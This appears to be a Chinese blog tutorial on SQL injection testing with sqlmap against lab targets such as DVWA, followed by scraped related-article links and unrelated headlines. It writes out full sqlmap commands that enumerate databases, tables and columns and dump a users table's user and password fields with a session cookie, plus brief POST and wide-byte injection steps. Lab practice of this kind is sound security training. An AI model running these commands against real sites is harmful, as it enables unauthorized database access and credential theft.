测试SQL注入

  Sqlmap.py -u "http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49"

可以从下面的测试结果看出此处存在SQL注入以及攻击类型和payload

获取数据库信息GET型

1. 获取数据库名字

  sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1"--current-db

得知数据库名字为:dvwa

2. 获取数据库表名

  sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa --table

3. 获取字段名

  sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users --column

4. 获取字段值

//只读取某一或某几列sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users -C user,password --dump//读取表中全部字段值Sqlmap.py -u “http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49” -D dvwa -T users --dump

获取数据库信息POST型

1. 抓包将信息复制到文件中

修改host以及将可以的地方可以标注星号

2. 语句

使用-r

3. 结果

宽字节注入

1. 抓包


发现使用普通命令跑不出来

加tamper试试

sqlmap测试靶机相关推荐

  1. 渗透测试-靶机打靶思路与方法

    渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...

  2. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  3. 看完这篇 教你玩转渗透测试靶机vulnhub——DC9

    Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...

  4. 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury

    Vulnhub靶机The Planets:Mercury渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏 ...

  5. docker 漏洞测试 靶机环境 靶机平台 vulhub vulapps 简介

    在实际学习中,经常需要模拟不同的漏洞环境,而使用公网的实例的话,多多少少又存在一些风险,因此能搭建一个本地的模拟环境去测试漏洞是一个不错的方案.Docker是近两年来十分流行的开源容器引擎,因此也出现 ...

  6. 看完这篇 教你玩转渗透测试靶机vulnhub——DC1

    Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...

  7. 看完这篇 教你玩转渗透测试靶机——Metasploitable2

    Metasploitable2渗透测试详解 Metasploitable2靶机介绍: Metasploitable2靶机下载: Metasploitable2靶机安装: Metasploitable2 ...

  8. 看完这篇 教你玩转渗透测试靶机vulnhub——DC3

    Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...

  9. 看完这篇 教你玩转渗透测试靶机vulnhub——DC7

    Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...

最新文章

  1. mysql 添加索引
  2. 【BZOJ1951】【SDOI2010】古代猪文 Lucas定理、中国剩余定理、exgcd、费马小定理
  3. sql 截取_如何用 SQL 找一个女朋友?
  4. form表单上传文件_SpringBoot中如何使用SpringMVC上传文件?
  5. Tomcat启动时项目重复加载,导致资源初始化两次的问题
  6. shell脚本中if流程控制语句的应用
  7. 【状压dp】AC Challenge
  8. 计算机组成原理白中英第五版之指令系统
  9. 论文中的Matlab画图常用技巧
  10. doc 问卷调查模板表_调查问卷范文调查问卷模板.doc
  11. java 多线程课件_Thread_java多线程参考源码_ppt_大学课件预览_高等教育资讯网
  12. 推荐一个好用的 sqlite 管理器 sqliteman 感觉比 navicat 好用
  13. 锂电池充电原理:充电电压电流的选择方法
  14. (Android) 日志打印 Log的使用
  15. stm32驱动TFTLCD液晶屏显示图片+汉字(快速上手,只教怎么用,不讲原理!)
  16. 软件工程师为什么单身的六宗罪
  17. java 为pdf添加水印图片
  18. summernote 添加emoji表情包
  19. ChatGPT会对未来5年的NLP算法从业者带来怎样的冲击?
  20. 如何利用python进行一次移动平均预测

热门文章

  1. Python爬取福利图要在中午,因为早晚会出事!我才存了2000文件夹
  2. 3G、WiFi、WLAN、蓝牙、zigbee区别
  3. 3dmip12小时内无法注册_国内用户将无法再注册Steam新账号
  4. 《云计算》 刘鹏 第二版 第三版 PDF
  5. 【C++练习】4.1假设有三家银行:中国银行BOC、工商银行ICBC和农业银行ABC
  6. 微信小程序云开发项目实战进阶 - 诗词大全成语接龙
  7. 实战saas系统多租户数据隔离(三)每个租户使用独立的表空间
  8. html accordion折叠菜单动态,jQuery EasyUI 布局插件 – Accordion 折叠面板 | 菜鸟教程...
  9. Matlab安装下载的工具箱
  10. ie不支持html56,是否浏览器设置有问题?